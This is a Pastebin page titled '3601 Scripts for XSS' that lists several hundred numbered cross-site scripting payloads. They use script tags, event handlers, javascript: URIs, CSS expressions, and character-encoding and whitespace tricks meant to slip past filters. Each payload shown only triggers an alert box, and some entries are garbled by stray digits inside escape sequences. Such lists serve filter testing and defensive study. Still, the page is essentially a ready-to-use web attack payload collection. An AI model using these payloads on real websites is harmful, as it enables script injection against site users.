Advertisement
FlyFar

3601 Scripts for XSS

Feb 2nd, 2024
391
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 222.33 KB | Cybersecurity | 0 0
  1.  
  2. <script>alert(1)</script>
  3. <script>alert(2)</script>
  4. medium--> ˫дÈƹý£º<sc<script>ript>alert(4)</script>
  5. ´óСд»ìÏýÈƹý£º<ScRipt>alert(5)</script>
  6. <img src=1 onerror=alert(7)>
  7. onmouseover=¡¯alert(9)¡¯
  8. <script>alert(11);</script>
  9. >"'><img src="javascript.:alert(12)">
  10. >"'><script>alert(13)</script>
  11. <table background='javascript.:alert(14)'></table>
  12. <object type=text/html data='javascript.:alert(15);'></object>
  13. "+alert(16)+"
  14. <body/onfocus=top.alert(17)>
  15. <img/src=22 onerror=window.alert(22)>
  16. <img src=62 onerror=(function(){alert(62)})()>
  17. <img src=63 onerror=!function(){alert(63)}()>
  18. <img src=64 onerror=%2bfunction(){alert(64)}()>
  19. <img src=65 onerror=%2dfunction(){alert(65)}()>
  20. <img src=66 onerror=~function(){alert(66)}()>
  21. <a href="javascript:`${alert(69)}`">XSS Test</a>
  22. <a href="javascript:[''].findIndex(alert(71)">XSS Test</a>
  23. <iframe onload=location=['javascript:alert(79)'].join(")>
  24. <a href="javascript:(new Function('alert(80))()">XSS Test</a>
  25. <body/onload=Function(alert(81))()>
  26. <img%0Dsrc=82 onerror=Function(alert(82))>
  27. <a href="javascript:(new (Object.getPrototypeOf(async function(){}).constructor)('alert(84))()">XSS Test</a>
  28. <body/onload=eval(location.hash.slice(85))>#alert(85)
  29. <body/onload=setTimeout(location.hash.substr(86))()>#alert(86)
  30. <body/onload=Set.constructor(location.hash.substr(87))()>#alert(87)
  31. <body/onload=execScript(location.hash.substr(88))>#alert(88)
  32. <body/onload=Function(location.hash.slice(90))()>#alert(90)
  33. <svg/onload=alert(91)
  34. <svg onload=eval(URL.slice(-8))>#alert(93)
  35. <body/onload=eval(location.hash.slice(94))>#javascript:alert(94)
  36. <iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(97)">
  37. <img src=101 onerror=location="javascript:alert(101)">
  38. <svg/onload="javascript:alert(103)" xmlns="http://www.baidu.com">
  39. <svg/onload=location='javascript:/*'%2blocation.hash> #*/alert(105)
  40. <svg/onload=location="javascript:"%2binnerHTML%2blocation.hash>" #"-alert(107)
  41. <svg/onload=with(location)with(hash)eval(alert(109))>
  42. <body onload=alert(140)>
  43. <body onpageshow=alert(141)>
  44. <body onfocus=alert(142)>
  45. <body onhashchange=alert(143)><a href=#></a>
  46. <body style=overflow:auto;height:144000px onscroll=alert(144) id=x>#x
  47. <body onscroll=alert(145)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
  48. <marquee onstart=alert(146)>
  49. <marquee loop=147 width=0 onfinish=alert(147)>
  50. <audio src onloadstart=alert(148)>
  51. <video onloadstart=alert(149)><source>
  52. <input autofocus onblur=alert(150)>
  53. <keygen autofocus onfocus=alert(151)>
  54. <form onsubmit=alert(152)><input type=submit>
  55. <select onchange=alert(153)><option>153<option>2
  56. <menu id=x contextmenu=x onshow=alert(154)>right click me!
  57. <x contenteditable onblur=alert(155)>lose focus!
  58. <x onclick=alert(156)>click this!
  59. <x oncopy=alert(157)>copy this!
  60. <x oncontextmenu=alert(158)>right click this!
  61. <x oncut=alert(159)>copy this!
  62. <x ondblclick=alert(160)>double click this!
  63. <x ondrag=alert(161)>drag this!
  64. <x contenteditable onfocus=alert(162)>focus this!
  65. <x contenteditable oninput=alert(163)>input here!
  66. <x contenteditable onkeydown=alert(164)>press any key!
  67. <x contenteditable onkeypress=alert(165)>press any key!
  68. <x contenteditable onkeyup=alert(166)>press any key!
  69. <x onmousedown=alert(167)>click this!
  70. <x onmousemove=alert(168)>hover this!
  71. <x onmouseout=alert(169)>hover this!
  72. <x onmouseover=alert(170)>hover this!
  73. <x onmouseup=alert(171)>click this!
  74. <x contenteditable onpaste=alert(172)>paste here!
  75. <brute contenteditable onblur=alert(173)>lose focus!
  76. <brute onclick=alert(174)>click this!
  77. <brute oncopy=alert(175)>copy this!
  78. <brute oncontextmenu=alert(176)>right click this!
  79. <brute oncut=alert(177)>copy this!
  80. <brute ondblclick=alert(178)>double click this!
  81. <brute ondrag=alert(179)>drag this!
  82. <brute contenteditable onfocus=alert(180)>focus this!
  83. <brute contenteditable oninput=alert(181)>input here!
  84. <brute contenteditable onkeydown=alert(182)>press any key!
  85. <brute contenteditable onkeypress=alert(183)>press any key!
  86. <brute contenteditable onkeyup=alert(184)>press any key!
  87. <brute onmousedown=alert(185)>click this!
  88. <brute onmousemove=alert(186)>hover this!
  89. <brute onmouseout=alert(187)>hover this!
  90. <brute onmouseover=alert(188)>hover this!
  91. <brute onmouseup=alert(189)>click this!
  92. <brute contenteditable onpaste=alert(190)>paste here!
  93. <brute style=font-size:500px onmouseover=alert(191)>0000
  94. <brute style=font-size:500px onmouseover=alert(192)>000192
  95. <brute style=font-size:500px onmouseover=alert(193)>0002
  96. <brute style=font-size:500px onmouseover=alert(194)>0003
  97. <script src=javascript:alert(196)>
  98. <iframe src=javascript:alert(197)>
  99. <embed src=javascript:alert(198)>
  100. <a href=javascript:alert(200)>click
  101. <math><brute href=javascript:alert(201)>click
  102. <form action=javascript:alert(203)><input type=submit>
  103. <isindex action=javascript:alert(204) type=submit value=click>
  104. <form><button formaction=javascript:alert(206)>click
  105. <form><input formaction=javascript:alert(207) type=submit value=click>
  106. <form><input formaction=javascript:alert(208) type=image value=click>
  107. <form><input formaction=javascript:alert(209) type=image src=http://brutelogic.com.br/webgun/img/youtube209.jpg>
  108. <isindex formaction=javascript:alert(210) type=submit value=click>
  109. <object data=javascript:alert(212)>
  110. <svg><script xlink:href=data:,alert(216)></script>
  111. <svg><script xlink:href=data:,alert(217) />
  112. <math><brute xlink:href=javascript:alert(218)>click
  113. <svg><a xmlns:xlink=http://www.w3.org/220999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(220) to=%26>
  114. '><script>alert(221)</script>
  115. ='><script>alert(222)</script>
  116. <script>alert(223)</script>
  117. <script>alert(224)</script>
  118. <s&#99;ript>alert(225)</script>
  119. <img src="javas&#99;ript:alert(226)">
  120. %0a%0a<script>alert(227)</script>.jsp
  121. %3c/a%3e%3cscript%3ealert(228)%3c/script%3e
  122. %3c/title%3e%3cscript%3ealert(229)%3c/script%3e
  123. %3cscript%3ealert(230)%3c/script%3e/index.html
  124. <script>alert(231)</script>
  125. a.jsp/<script>alert(232)</script>
  126. "><script>alert(233)</script>
  127. <IMG SRC="javascript.:alert(234);">
  128. <IMG SRC="jav&#x09;ascript.:alert(238);">
  129. <IMG SRC="jav&#x0A;ascript.:alert(239);">
  130. <IMG SRC="jav&#x0D;ascript.:alert(240);">
  131. "<IMG src="/java"\0script.:alert(241)>";'>out
  132. <IMG SRC=" javascript.:alert(242);">
  133. <SCRIPT>a=/XSS/alert(243)</SCRIPT>
  134. <BODY BACKGROUND="javascript.:alert(244)">
  135. <BODY ONLOAD=alert(245)>
  136. <IMG DYNSRC="javascript.:alert(246)">
  137. <IMG LOWSRC="javascript.:alert(247)">
  138. <BGSOUND SRC="javascript.:alert(248);">
  139. <br size="&{alert(249)}">
  140. <LINK REL="stylesheet"HREF="javascript.:alert(251);">
  141. <META. HTTP-EQUIV="refresh"CONTENT="0;url=javascript.:alert(253);">
  142. <TABLE BACKGROUND="javascript.:alert(256)">
  143. <DIV STYLE="background-image: url(javascript.:alert(257))">
  144. <DIV STYLE="width: expression(alert(259));">
  145. <STYLE>@im\port'\ja\vasc\ript:alert(260)';</STYLE>
  146. <IMG STYLE='xss:expre\ssion(alert(261))'>
  147. <STYLE. TYPE="text/javascript">alert(262);</STYLE>
  148. <STYLE. TYPE="text/css">.XSS{background-image:url("javascript.:alert(263)");}</STYLE><A CLASS=XSS></A>
  149. <STYLE. type="text/css">BODY{background:url("javascript.:alert(264)")}</STYLE>
  150. <BASE HREF="javascript.:alert(265);//">
  151. getURL("javascript.:alert(266)")
  152. a="get";b="URL";c="javascript.:";d="alert(267);";eval(a+b+c+d);
  153. <XML SRC="javascript.:alert(268);">
  154. "> <BODY NLOAD="a();"><SCRIPT>function a(){alert(269);}</SCRIPT><"
  155. <IMG SRC="javascript.:alert(271)"
  156. <script\x20type="text/javascript">javascript:alert(278);</script>
  157. <script\x3Etype="text/javascript">javascript:alert(279);</script>
  158. <script\x0Dtype="text/javascript">javascript:alert(280);</script>
  159. <script\x09type="text/javascript">javascript:alert(281);</script>
  160. <script\x0Ctype="text/javascript">javascript:alert(282);</script>
  161. <script\x2Ftype="text/javascript">javascript:alert(283);</script>
  162. <script\x0Atype="text/javascript">javascript:alert(284);</script>
  163. '`"><\x3Cscript>javascript:alert(285)</script>
  164. '`"><\x00script>javascript:alert(286)</script>
  165. <img src=287 href=287 onerror="javascript:alert(287)"></img>
  166. <audio src=288 href=288 onerror="javascript:alert(288)"></audio>
  167. <video src=289 href=289 onerror="javascript:alert(289)"></video>
  168. <body src=290 href=290 onerror="javascript:alert(290)"></body>
  169. <image src=291 href=291 onerror="javascript:alert(291)"></image>
  170. <object src=292 href=292 onerror="javascript:alert(292)"></object>
  171. <script src=293 href=293 onerror="javascript:alert(293)"></script>
  172. <svg onResize svg onResize="javascript:javascript:alert(294)"></svg onResize>
  173. <title onPropertyChange title onPropertyChange="javascript:javascript:alert(295)"></title onPropertyChange>
  174. <iframe onLoad iframe onLoad="javascript:javascript:alert(296)"></iframe onLoad>
  175. <body onMouseEnter body onMouseEnter="javascript:javascript:alert(297)"></body onMouseEnter>
  176. <body onFocus body onFocus="javascript:javascript:alert(298)"></body onFocus>
  177. <frameset onScroll frameset onScroll="javascript:javascript:alert(299)"></frameset onScroll>
  178. <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(300)"></script onReadyStateChange>
  179. <html onMouseUp html onMouseUp="javascript:javascript:alert(301)"></html onMouseUp>
  180. <body onPropertyChange body onPropertyChange="javascript:javascript:alert(302)"></body onPropertyChange>
  181. <svg onLoad svg onLoad="javascript:javascript:alert(303)"></svg onLoad>
  182. <body onPageHide body onPageHide="javascript:javascript:alert(304)"></body onPageHide>
  183. <body onMouseOver body onMouseOver="javascript:javascript:alert(305)"></body onMouseOver>
  184. <body onUnload body onUnload="javascript:javascript:alert(306)"></body onUnload>
  185. <body onLoad body onLoad="javascript:javascript:alert(307)"></body onLoad>
  186. <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(308)"></bgsound onPropertyChange>
  187. <html onMouseLeave html onMouseLeave="javascript:javascript:alert(309)"></html onMouseLeave>
  188. <html onMouseWheel html onMouseWheel="javascript:javascript:alert(310)"></html onMouseWheel>
  189. <style onLoad style onLoad="javascript:javascript:alert(311)"></style onLoad>
  190. <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(312)"></iframe onReadyStateChange>
  191. <body onPageShow body onPageShow="javascript:javascript:alert(313)"></body onPageShow>
  192. <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(314)"></style onReadyStateChange>
  193. <frameset onFocus frameset onFocus="javascript:javascript:alert(315)"></frameset onFocus>
  194. <applet onError applet onError="javascript:javascript:alert(316)"></applet onError>
  195. <marquee onStart marquee onStart="javascript:javascript:alert(317)"></marquee onStart>
  196. <script onLoad script onLoad="javascript:javascript:alert(318)"></script onLoad>
  197. <html onMouseOver html onMouseOver="javascript:javascript:alert(319)"></html onMouseOver>
  198. <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(320)"></html onMouseEnter>
  199. <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(321)"></body onBeforeUnload>
  200. <html onMouseDown html onMouseDown="javascript:javascript:alert(322)"></html onMouseDown>
  201. <marquee onScroll marquee onScroll="javascript:javascript:alert(323)"></marquee onScroll>
  202. <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(324)"></xml onPropertyChange>
  203. <frameset onBlur frameset onBlur="javascript:javascript:alert(325)"></frameset onBlur>
  204. <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(326)"></applet onReadyStateChange>
  205. <svg onUnload svg onUnload="javascript:javascript:alert(327)"></svg onUnload>
  206. <html onMouseOut html onMouseOut="javascript:javascript:alert(328)"></html onMouseOut>
  207. <body onMouseMove body onMouseMove="javascript:javascript:alert(329)"></body onMouseMove>
  208. <body onResize body onResize="javascript:javascript:alert(330)"></body onResize>
  209. <object onError object onError="javascript:javascript:alert(331)"></object onError>
  210. <body onPopState body onPopState="javascript:javascript:alert(332)"></body onPopState>
  211. <html onMouseMove html onMouseMove="javascript:javascript:alert(333)"></html onMouseMove>
  212. <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(334)"></applet onreadystatechange>
  213. <body onpagehide body onpagehide="javascript:javascript:alert(335)"></body onpagehide>
  214. <svg onunload svg onunload="javascript:javascript:alert(336)"></svg onunload>
  215. <applet onerror applet onerror="javascript:javascript:alert(337)"></applet onerror>
  216. <body onkeyup body onkeyup="javascript:javascript:alert(338)"></body onkeyup>
  217. <body onunload body onunload="javascript:javascript:alert(339)"></body onunload>
  218. <iframe onload iframe onload="javascript:javascript:alert(340)"></iframe onload>
  219. <body onload body onload="javascript:javascript:alert(341)"></body onload>
  220. <html onmouseover html onmouseover="javascript:javascript:alert(342)"></html onmouseover>
  221. <object onbeforeload object onbeforeload="javascript:javascript:alert(343)"></object onbeforeload>
  222. <body onbeforeunload body onbeforeunload="javascript:javascript:alert(344)"></body onbeforeunload>
  223. <body onfocus body onfocus="javascript:javascript:alert(345)"></body onfocus>
  224. <body onkeydown body onkeydown="javascript:javascript:alert(346)"></body onkeydown>
  225. <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(347)"></iframe onbeforeload>
  226. <iframe src iframe src="javascript:javascript:alert(348)"></iframe src>
  227. <svg onload svg onload="javascript:javascript:alert(349)"></svg onload>
  228. <html onmousemove html onmousemove="javascript:javascript:alert(350)"></html onmousemove>
  229. <body onblur body onblur="javascript:javascript:alert(351)"></body onblur>
  230. \x3Cscript>javascript:alert(352)</script>
  231. '"`><script>/* *\x2Fjavascript:alert(353)// */</script>
  232. <script>javascript:alert(354)</script\x0D
  233. <script>javascript:alert(355)</script\x0A
  234. <script>javascript:alert(356)</script\x0B
  235. <script charset="\x22>javascript:alert(357)</script>
  236. <!--\x3E<img src=xxx:x onerror=javascript:alert(358)> -->
  237. --><!-- ---> <img src=xxx:x onerror=javascript:alert(359)> -->
  238. --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(360)> -->
  239. --><!-- --\x2361> <img src=xxx:x onerror=javascript:alert(361)> -->
  240. --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(362)> -->
  241. `"'><img src='#\x27 onerror=javascript:alert(363)>
  242. <a href="javascript\x3Ajavascript:alert(364)" id="fuzzelement364">test</a>
  243. "'`><p><svg><script>a='hello\x27;javascript:alert(365)//';</script></p>
  244. <a href="javas\x00cript:javascript:alert(366)" id="fuzzelement366">test</a>
  245. <a href="javas\x07cript:javascript:alert(367)" id="fuzzelement367">test</a>
  246. <a href="javas\x0Dcript:javascript:alert(368)" id="fuzzelement368">test</a>
  247. <a href="javas\x0Acript:javascript:alert(369)" id="fuzzelement369">test</a>
  248. <a href="javas\x08cript:javascript:alert(370)" id="fuzzelement370">test</a>
  249. <a href="javas\x02cript:javascript:alert(371)" id="fuzzelement371">test</a>
  250. <a href="javas\x03cript:javascript:alert(372)" id="fuzzelement372">test</a>
  251. <a href="javas\x04cript:javascript:alert(373)" id="fuzzelement373">test</a>
  252. <a href="javas\x0374cript:javascript:alert(374)" id="fuzzelement374">test</a>
  253. <a href="javas\x05cript:javascript:alert(375)" id="fuzzelement375">test</a>
  254. <a href="javas\x0Bcript:javascript:alert(376)" id="fuzzelement376">test</a>
  255. <a href="javas\x09cript:javascript:alert(377)" id="fuzzelement377">test</a>
  256. <a href="javas\x06cript:javascript:alert(378)" id="fuzzelement378">test</a>
  257. <a href="javas\x0Ccript:javascript:alert(379)" id="fuzzelement379">test</a>
  258. <script>/* *\x2A/javascript:alert(380)// */</script>
  259. <script>/* *\x00/javascript:alert(381)// */</script>
  260. <style></style\x3E<img src="about:blank" onerror=javascript:alert(382)//></style>
  261. <style></style\x0D<img src="about:blank" onerror=javascript:alert(383)//></style>
  262. <style></style\x09<img src="about:blank" onerror=javascript:alert(384)//></style>
  263. <style></style\x20<img src="about:blank" onerror=javascript:alert(385)//></style>
  264. <style></style\x0A<img src="about:blank" onerror=javascript:alert(386)//></style>
  265. "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(387);/*';">DEF
  266. "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(388);/*';">DEF
  267. <script>if("x\\xE389\x96\x89".length==2) { javascript:alert(389);}</script>
  268. <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(390);}</script>
  269. <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(391);}</script>
  270. '`"><\x3Cscript>javascript:alert(392)</script>
  271. '`"><\x00script>javascript:alert(393)</script>
  272. "'`><\x3Cimg src=xxx:x onerror=javascript:alert(394)>
  273. "'`><\x00img src=xxx:x onerror=javascript:alert(395)>
  274. <script src="data:text/plain\x2Cjavascript:alert(396)"></script>
  275. <script src="data:\xD4\x8F,javascript:alert(397)"></script>
  276. <script src="data:\xE0\xA4\x98,javascript:alert(398)"></script>
  277. <script src="data:\xCB\x8F,javascript:alert(399)"></script>
  278. <script\x20type="text/javascript">javascript:alert(400);</script>
  279. <script\x3Etype="text/javascript">javascript:alert(401);</script>
  280. <script\x0Dtype="text/javascript">javascript:alert(402);</script>
  281. <script\x09type="text/javascript">javascript:alert(403);</script>
  282. <script\x0Ctype="text/javascript">javascript:alert(404);</script>
  283. <script\x2Ftype="text/javascript">javascript:alert(405);</script>
  284. <script\x0Atype="text/javascript">javascript:alert(406);</script>
  285. ABC<div style="x\x3Aexpression(javascript:alert(407)">DEF
  286. ABC<div style="x:expression\x5C(javascript:alert(408)">DEF
  287. ABC<div style="x:expression\x00(javascript:alert(409)">DEF
  288. ABC<div style="x:exp\x00ression(javascript:alert(410)">DEF
  289. ABC<div style="x:exp\x5Cression(javascript:alert(411)">DEF
  290. ABC<div style="x:\x0Aexpression(javascript:alert(412)">DEF
  291. ABC<div style="x:\x09expression(javascript:alert(413)">DEF
  292. ABC<div style="x:\xE3\x80\x80expression(javascript:alert(414)">DEF
  293. ABC<div style="x:\xE2\x80\x84expression(javascript:alert(415)">DEF
  294. ABC<div style="x:\xC2\xA0expression(javascript:alert(416)">DEF
  295. ABC<div style="x:\xE2\x80\x80expression(javascript:alert(417)">DEF
  296. ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(418)">DEF
  297. ABC<div style="x:\x0Dexpression(javascript:alert(419)">DEF
  298. ABC<div style="x:\x0Cexpression(javascript:alert(420)">DEF
  299. ABC<div style="x:\xE2\x80\x87expression(javascript:alert(421)">DEF
  300. ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(422)">DEF
  301. ABC<div style="x:\x20expression(javascript:alert(423)">DEF
  302. ABC<div style="x:\xE2\x80\x88expression(javascript:alert(424)">DEF
  303. ABC<div style="x:\x00expression(javascript:alert(425)">DEF
  304. ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(426)">DEF
  305. ABC<div style="x:\xE2\x80\x86expression(javascript:alert(427)">DEF
  306. ABC<div style="x:\xE2\x80\x85expression(javascript:alert(428)">DEF
  307. ABC<div style="x:\xE2\x80\x82expression(javascript:alert(429)">DEF
  308. ABC<div style="x:\x0Bexpression(javascript:alert(430)">DEF
  309. ABC<div style="x:\xE2\x80\x8431expression(javascript:alert(431)">DEF
  310. ABC<div style="x:\xE2\x80\x83expression(javascript:alert(432)">DEF
  311. ABC<div style="x:\xE2\x80\x89expression(javascript:alert(433)">DEF
  312. <a href="\x0Bjavascript:javascript:alert(434)" id="fuzzelement434">test</a>
  313. <a href="\x0Fjavascript:javascript:alert(435)" id="fuzzelement435">test</a>
  314. <a href="\xC2\xA0javascript:javascript:alert(436)" id="fuzzelement436">test</a>
  315. <a href="\x05javascript:javascript:alert(437)" id="fuzzelement437">test</a>
  316. <a href="\xE438\xA0\x8Ejavascript:javascript:alert(438)" id="fuzzelement438">test</a>
  317. <a href="\x4398javascript:javascript:alert(439)" id="fuzzelement439">test</a>
  318. <a href="\x440440javascript:javascript:alert(440)" id="fuzzelement440">test</a>
  319. <a href="\xE2\x80\x88javascript:javascript:alert(441)" id="fuzzelement441">test</a>
  320. <a href="\xE2\x80\x89javascript:javascript:alert(442)" id="fuzzelement442">test</a>
  321. <a href="\xE2\x80\x80javascript:javascript:alert(443)" id="fuzzelement443">test</a>
  322. <a href="\x4447javascript:javascript:alert(444)" id="fuzzelement444">test</a>
  323. <a href="\x03javascript:javascript:alert(445)" id="fuzzelement445">test</a>
  324. <a href="\x0Ejavascript:javascript:alert(446)" id="fuzzelement446">test</a>
  325. <a href="\x447Ajavascript:javascript:alert(447)" id="fuzzelement447">test</a>
  326. <a href="\x00javascript:javascript:alert(448)" id="fuzzelement448">test</a>
  327. <a href="\x4490javascript:javascript:alert(449)" id="fuzzelement449">test</a>
  328. <a href="\xE2\x80\x82javascript:javascript:alert(450)" id="fuzzelement450">test</a>
  329. <a href="\x20javascript:javascript:alert(451)" id="fuzzelement451">test</a>
  330. <a href="\x4523javascript:javascript:alert(452)" id="fuzzelement452">test</a>
  331. <a href="\x09javascript:javascript:alert(453)" id="fuzzelement453">test</a>
  332. <a href="\xE2\x80\x8Ajavascript:javascript:alert(454)" id="fuzzelement454">test</a>
  333. <a href="\x4554javascript:javascript:alert(455)" id="fuzzelement455">test</a>
  334. <a href="\x4569javascript:javascript:alert(456)" id="fuzzelement456">test</a>
  335. <a href="\xE2\x80\xAFjavascript:javascript:alert(457)" id="fuzzelement457">test</a>
  336. <a href="\x458Fjavascript:javascript:alert(458)" id="fuzzelement458">test</a>
  337. <a href="\xE2\x80\x8459javascript:javascript:alert(459)" id="fuzzelement459">test</a>
  338. <a href="\x460Djavascript:javascript:alert(460)" id="fuzzelement460">test</a>
  339. <a href="\xE2\x80\x87javascript:javascript:alert(461)" id="fuzzelement461">test</a>
  340. <a href="\x07javascript:javascript:alert(462)" id="fuzzelement462">test</a>
  341. <a href="\xE463\x9A\x80javascript:javascript:alert(463)" id="fuzzelement463">test</a>
  342. <a href="\xE2\x80\x83javascript:javascript:alert(464)" id="fuzzelement464">test</a>
  343. <a href="\x04javascript:javascript:alert(465)" id="fuzzelement465">test</a>
  344. <a href="\x0466javascript:javascript:alert(466)" id="fuzzelement466">test</a>
  345. <a href="\x08javascript:javascript:alert(467)" id="fuzzelement467">test</a>
  346. <a href="\xE2\x80\x84javascript:javascript:alert(468)" id="fuzzelement468">test</a>
  347. <a href="\xE2\x80\x86javascript:javascript:alert(469)" id="fuzzelement469">test</a>
  348. <a href="\xE3\x80\x80javascript:javascript:alert(470)" id="fuzzelement470">test</a>
  349. <a href="\x4712javascript:javascript:alert(471)" id="fuzzelement471">test</a>
  350. <a href="\x0Djavascript:javascript:alert(472)" id="fuzzelement472">test</a>
  351. <a href="\x0Ajavascript:javascript:alert(473)" id="fuzzelement473">test</a>
  352. <a href="\x0Cjavascript:javascript:alert(474)" id="fuzzelement474">test</a>
  353. <a href="\x4755javascript:javascript:alert(475)" id="fuzzelement475">test</a>
  354. <a href="\xE2\x80\xA8javascript:javascript:alert(476)" id="fuzzelement476">test</a>
  355. <a href="\x4776javascript:javascript:alert(477)" id="fuzzelement477">test</a>
  356. <a href="\x02javascript:javascript:alert(478)" id="fuzzelement478">test</a>
  357. <a href="\x479Bjavascript:javascript:alert(479)" id="fuzzelement479">test</a>
  358. <a href="\x06javascript:javascript:alert(480)" id="fuzzelement480">test</a>
  359. <a href="\xE2\x80\xA9javascript:javascript:alert(481)" id="fuzzelement481">test</a>
  360. <a href="\xE2\x80\x85javascript:javascript:alert(482)" id="fuzzelement482">test</a>
  361. <a href="\x483Ejavascript:javascript:alert(483)" id="fuzzelement483">test</a>
  362. <a href="\xE2\x8484\x9Fjavascript:javascript:alert(484)" id="fuzzelement484">test</a>
  363. <a href="\x485Cjavascript:javascript:alert(485)" id="fuzzelement485">test</a>
  364. <a href="javascript\x00:javascript:alert(486)" id="fuzzelement486">test</a>
  365. <a href="javascript\x3A:javascript:alert(487)" id="fuzzelement487">test</a>
  366. <a href="javascript\x09:javascript:alert(488)" id="fuzzelement488">test</a>
  367. <a href="javascript\x0D:javascript:alert(489)" id="fuzzelement489">test</a>
  368. <a href="javascript\x0A:javascript:alert(490)" id="fuzzelement490">test</a>
  369. `"'><img src=xxx:x \x0Aonerror=javascript:alert(491)>
  370. `"'><img src=xxx:x \x22onerror=javascript:alert(492)>
  371. `"'><img src=xxx:x \x0Bonerror=javascript:alert(493)>
  372. `"'><img src=xxx:x \x0Donerror=javascript:alert(494)>
  373. `"'><img src=xxx:x \x2Fonerror=javascript:alert(495)>
  374. `"'><img src=xxx:x \x09onerror=javascript:alert(496)>
  375. `"'><img src=xxx:x \x0Conerror=javascript:alert(497)>
  376. `"'><img src=xxx:x \x00onerror=javascript:alert(498)>
  377. `"'><img src=xxx:x \x27onerror=javascript:alert(499)>
  378. `"'><img src=xxx:x \x20onerror=javascript:alert(500)>
  379. "`'><script>\x3Bjavascript:alert(501)</script>
  380. "`'><script>\x0Djavascript:alert(502)</script>
  381. "`'><script>\xEF\xBB\xBFjavascript:alert(503)</script>
  382. "`'><script>\xE2\x80\x8504javascript:alert(504)</script>
  383. "`'><script>\xE2\x80\x84javascript:alert(505)</script>
  384. "`'><script>\xE3\x80\x80javascript:alert(506)</script>
  385. "`'><script>\x09javascript:alert(507)</script>
  386. "`'><script>\xE2\x80\x89javascript:alert(508)</script>
  387. "`'><script>\xE2\x80\x85javascript:alert(509)</script>
  388. "`'><script>\xE2\x80\x88javascript:alert(510)</script>
  389. "`'><script>\x00javascript:alert(511)</script>
  390. "`'><script>\xE2\x80\xA8javascript:alert(512)</script>
  391. "`'><script>\xE2\x80\x8Ajavascript:alert(513)</script>
  392. "`'><script>\xE514\x9A\x80javascript:alert(514)</script>
  393. "`'><script>\x0Cjavascript:alert(515)</script>
  394. "`'><script>\x2Bjavascript:alert(516)</script>
  395. "`'><script>\xF0\x90\x96\x9Ajavascript:alert(517)</script>
  396. "`'><script>-javascript:alert(518)</script>
  397. "`'><script>\x0Ajavascript:alert(519)</script>
  398. "`'><script>\xE2\x80\xAFjavascript:alert(520)</script>
  399. "`'><script>\x7Ejavascript:alert(521)</script>
  400. "`'><script>\xE2\x80\x87javascript:alert(522)</script>
  401. "`'><script>\xE2\x8523\x9Fjavascript:alert(523)</script>
  402. "`'><script>\xE2\x80\xA9javascript:alert(524)</script>
  403. "`'><script>\xC2\x85javascript:alert(525)</script>
  404. "`'><script>\xEF\xBF\xAEjavascript:alert(526)</script>
  405. "`'><script>\xE2\x80\x83javascript:alert(527)</script>
  406. "`'><script>\xE2\x80\x8Bjavascript:alert(528)</script>
  407. "`'><script>\xEF\xBF\xBEjavascript:alert(529)</script>
  408. "`'><script>\xE2\x80\x80javascript:alert(530)</script>
  409. "`'><script>\x2531javascript:alert(531)</script>
  410. "`'><script>\xE2\x80\x82javascript:alert(532)</script>
  411. "`'><script>\xE2\x80\x86javascript:alert(533)</script>
  412. "`'><script>\xE534\xA0\x8Ejavascript:alert(534)</script>
  413. "`'><script>\x0Bjavascript:alert(535)</script>
  414. "`'><script>\x20javascript:alert(536)</script>
  415. "`'><script>\xC2\xA0javascript:alert(537)</script>
  416. "/><img/onerror=\x0Bjavascript:alert(538)\x0Bsrc=xxx:x />
  417. "/><img/onerror=\x22javascript:alert(539)\x22src=xxx:x />
  418. "/><img/onerror=\x09javascript:alert(540)\x09src=xxx:x />
  419. "/><img/onerror=\x27javascript:alert(541)\x27src=xxx:x />
  420. "/><img/onerror=\x0Ajavascript:alert(542)\x0Asrc=xxx:x />
  421. "/><img/onerror=\x0Cjavascript:alert(543)\x0Csrc=xxx:x />
  422. "/><img/onerror=\x0Djavascript:alert(544)\x0Dsrc=xxx:x />
  423. "/><img/onerror=\x60javascript:alert(545)\x60src=xxx:x />
  424. "/><img/onerror=\x20javascript:alert(546)\x20src=xxx:x />
  425. <script\x2F>javascript:alert(547)</script>
  426. <script\x20>javascript:alert(548)</script>
  427. <script\x0D>javascript:alert(549)</script>
  428. <script\x0A>javascript:alert(550)</script>
  429. <script\x0C>javascript:alert(551)</script>
  430. <script\x00>javascript:alert(552)</script>
  431. <script\x09>javascript:alert(553)</script>
  432. `"'><img src=xxx:x onerror\x0B=javascript:alert(554)>
  433. `"'><img src=xxx:x onerror\x00=javascript:alert(555)>
  434. `"'><img src=xxx:x onerror\x0C=javascript:alert(556)>
  435. `"'><img src=xxx:x onerror\x0D=javascript:alert(557)>
  436. `"'><img src=xxx:x onerror\x20=javascript:alert(558)>
  437. `"'><img src=xxx:x onerror\x0A=javascript:alert(559)>
  438. `"'><img src=xxx:x onerror\x09=javascript:alert(560)>
  439. <script>javascript:alert(561)<\x00/script>
  440. <img src=# onerror\x3D"javascript:alert(562)"
  441. <input onfocus=javascript:alert(563) autofocus>
  442. <input onblur=javascript:alert(564) autofocus><input autofocus>
  443. <video poster=javascript:javascript:alert(565)//
